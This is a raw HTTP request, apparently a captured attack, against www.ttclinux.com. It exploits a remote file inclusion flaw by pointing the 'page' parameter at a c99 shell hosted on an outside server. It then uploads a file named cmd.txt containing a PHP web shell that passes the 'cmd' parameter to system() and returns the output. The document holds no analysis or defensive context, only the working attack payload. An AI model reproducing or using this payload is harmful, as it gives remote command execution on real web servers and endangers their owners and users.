POST /index.php?page=http://www.ss3s.org/c99.txt? HTTP/1.1
Host: www.ttclinux.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.ttclinux.com/index.php?page=http://www.ss3s.org/c99.txt?
Cookie: PHPSESSID=29d6f7b6bc7c288aa346735fc24d2f87; hotlog=1
Content-Type: multipart/form-data; boundary=---------------------------29634254612243
Content-Length: 901

-----------------------------29634254612243
Content-Disposition: form-data; name="act"

upload
-----------------------------29634254612243
Content-Disposition: form-data; name="uploadfile"; filename="cmd.txt"
Content-Type: text/plain

<html>
<body>

<?php
  $md=$_GET['cmd'];
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$md 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
 </body>
</html>
-----------------------------29634254612243
Content-Disposition: form-data; name="miniform"

1
-----------------------------29634254612243
Content-Disposition: form-data; name="submit"

Upload
-----------------------------29634254612243--